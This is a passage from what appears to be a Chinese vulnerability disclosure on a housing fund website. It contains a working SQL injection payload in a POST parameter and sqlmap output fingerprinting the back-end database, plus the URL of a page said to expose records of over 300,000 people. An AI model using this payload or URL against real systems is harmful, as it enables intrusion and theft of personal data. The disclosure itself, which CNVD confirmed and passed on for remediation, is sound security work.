kQ/lrqHorqHnm5HnnaPnp5EP57u85ZCI566h55CG56eRD+Wkp+eUsOeuoeeQhumDqA/msLjlronnrqHnkIbpg6gP5piO5rqq566h55CG6YOoD+a4hea1geeuoeeQhumDqA/lroHljJbnrqHnkIbpg6gP5bu65a6B566h55CG6YOoD+azsOWugeeuoeeQhumDqA/lsIbkuZDnrqHnkIbpg6gP5rKZ5Y6/566h55CG6YOoD+WwpOa6queuoeeQhumDqBUQBDAxMDAEMDEwMQQwMTAyBDAxMDMEMDEwNAQwMTA1BDAyMDAEMDMwMAQwNDAwBDA1MDAEMDYwMAQwNzAwBDA4MDAEMDkwMAQxMDAwBDExMDAUKwMQZ2dnZ2dnZ2dnZ2dnZ2dnZxYBZmQCIQ8WAh8AZmQCIw8PFgIeB1Zpc2libGVnZGQCJQ8PFgYeDVBhZ2VyUGFnZVNpemUCBR4OUGFnZXJSZWNvcmROdW1mHg5QYWdlclBhZ2VJbmRleAIBZGQCJw9kFggCAQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQhMaW5rTmFtZR4ORGF0YVZhbHVlRmllbGQFB0xpbmtVcmweC18hRGF0YUJvdW5kZ2QQFQMTLS0t5ZCI5L2c5Y2V5L2NLS0tLR7kuInmmI7miL/lnLDkuqfnrqHnkIbkv6Hmga/nvZEe5LiJ5piO5L2P5oi/572u5Lia5ouF5L+d5YWs5Y+4FQMAF2h0dHA6Ly93d3cuc21mZGMuY29tLmNuE2h0dHA6Ly93d3cuc21mZGMuY24UKwMDZ2dnZGQCAw8QDxYGHwYFCExpbmtOYW1lHwcFB0xpbmtVcmwfCGdkEBUFEy0tLeaUv+W6nOmDqOmXqC0tLS0b5LiJ5piO5biC5Lq65rCR5pS/5bqc572R56uZHuS4reWkruS6uuawkeaUv+W6nOmXqOaIt+e9keermRjnpo/lu7rnnIHlu7rorr7kv6Hmga/nvZES56aP5bu655yB6LSi5pS/5Y6FFQUAFGh0dHA6Ly93d3cuc20uZ292LmNuEmh0dHA6Ly93d3cuZ292LmNuLxdodHRwOi8vd3d3LmZqanMuZ292LmNuLxlodHRwOi8vd3d3LmZqaWNwYS5vcmcuY24vFCsDBWdnZ2dnZGQCBQ8QDxYGHwYFCExpbmtOYW1lHwcFB0xpbmtVcmwfCGdkEBUMFi0tLeWFtuS7luWFrOenr+mHkS0tLS0b56aP5bee5L2P5oi/5YWs56ev6YeR572R56uZG+WOpumXqOS9j+aIv+WFrOenr+mHkee9keermRvmvLPlt57kvY/miL/lhaznp6/ph5HnvZHnq5kb5rOJ5bee5L2P5oi/5YWs56ev6YeR572R56uZG+m+meWyqeS9j+aIv+WFrOenr+mHkee9keermRvljZflubPkvY/miL/lhaznp6/ph5HnvZHnq5kb5a6B5b635L2P5oi/5YWs56ev6YeR572R56uZG+iOhueUsOS9j+aIv+WFrOenr+mHkee9keermRvljJfkuqzkvY/miL/lhaznp6/ph5HnvZHnq5kb5LiK5rW35L2P5oi/5YWs56ev6YeR572R56uZG+Wkqea0peS9j+aIv+WFrOenr+mHkee9keermRUMABZodHRwOi8vd3d3LmZ6emZnamouY29tF2h0dHA6Ly93d3cueG1namouZ292LmNuGGh0dHA6Ly93d3cuenpnamouZ292LmNuLxRodHRwOi8vd3d3LnF6Z2pqLmNvbRlodHRwOi8vd3d3Lmxvbmd5YW5namouY29tFGh0dHA6Ly93d3cubnBnamouY29tFGh0dHA6Ly93d3cubmRnamouY29tFGh0dHA6Ly93d3cucHRnamouY29tF2h0dHA6Ly93d3cuYmpnamouZ292LmNuFGh0dHA6Ly93d3cuc2hnamouY29tF2h0dHA6Ly93d3cuaG91c2VmdW5kLmNuFCsDDGdnZ2dnZ2dnZ2dnZ2RkAgcPEA8WBh8GBQhMaW5rTmFtZR8HBQdMaW5rVXJsHwhnZBAVCBMtLS3lhbbku5bnvZHnq5ktLS0tD+aIv+S6p+S5i+eql+e9kQbnmb7luqYJ5Lq65rCR572RCeWSjOiur+e9kQnmlrDljY7nvZEP56aP5bee5pCc5oi/572RCeS4reWNjue9kRUIABhodHRwOi8vd3d3LmVob21lZGF5LmNvbS8UaHR0cDovL3d3dy5iYWlkdS5jb20ZaHR0cDovL3d3dy5wZW9wbGUuY29tLmNuLxVodHRwOi8vd3d3LmhleHVuLmNvbS8ZaHR0cDovL3d3dy54aW5odWFuZXQuY29tLxVodHRwOi8vZnouc291ZnVuLmNvbS8baHR0cDovL3d3dy5jaGluYS5jb20vemhfY24vFCsDCGdnZ2dnZ2dnZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFDmltZ1dvWWFvTGl1WWFuBQ9pbWdTdW9Zb3VMaXVZYW4FCWJ0blNlYXJjaDS79vZyaNg/Si/Qvfd08ltzABpu&__EVENTVALIDATION=/wEWLgKro+2nDQLu2pbfAwLHoITABwKL+9LNBwLdtoOaCwLN2an0BwLS2an0BwLT2an0BwLQ2an0BwLR2an0BwLE2qDWDwKG+5ajBwLEhISFCwKe66LgAgKf66LgAgKc66LgAgKb+8ahBAKln/PuCgK9l+PkCwKN5NbZBwLb2KFcAuXp1uwLAv+YtpwJAvzjt4ACApbribUJAtON+OkCAuGR+4QKAveSyOQNApCGuoUEArmSlLwKArfNzccIAr/FrYAMAvHPoesKAv3KoesKAo3P2fQKAvTZrrUEAunJhecNAujOz4UCAsvBnsQFAtmxrLcOArb4gqUJAtL4xMcOAuGA1Z8HAvD9kDgCkt303QkCtfe5hgzzQoCFRGmiTihZZ/sQvN+N8yI+zw==&txtkey=1&drpSearch=0&txtStart=2012-08-15&txtEnd=2015-08-15&txtName=2' AND 3919=CONVERT(INT,(SELECTCHAR(113)+CHAR(109)+CHAR(120)+CHAR(100)+CHAR(113)+(SELECT (CASE WHEN (3919=3919) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(116)+CHAR(109)+CHAR(106)+CHAR(113))) AND 'zQNC'='zQNC&dlstRange=2&txtNum=1&ddlPageIndex=1&HomePageBottomInfo1$dlsthzdw=&HomePageBottomInfo1$dlstzfbm=&HomePageBottomInfo1$dlstqtgjj=&HomePageBottomInfo1$dlstqtwz=&btnSearch.x=33&btnSearch.y=14---there were multiple injection points, please select the one to use for following injections:[0] place: POST, parameter: txtName, type: Single quoted string (default)[1] place: POST, parameter: txtNum, type: Single quoted string[q] Quit> 0[15:44:54] [INFO] testing Microsoft SQL Server[15:44:54] [INFO] confirming Microsoft SQL Server[15:44:57] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008
后面获取信息有些问题就不继续了。2、可以读取记录文件,获取30余万人身份证、手机、工作信息地址已经被提交过的:
http://www.smgjj.com/database/DataInput.aspx
获取上传的记录文件,里面含有大量的身份证、手机、工作信息、住址、甚至缴纳公积金的信息!~~~
如上
过滤修复权限查看!~~~
危害等级:高
漏洞Rank:12
确认时间:2015-08-19 10:10
CNVD确认并复现所述情况,已经转由CNCERT下发给福建分中心,由其后续协调网站管理单位处置。
暂无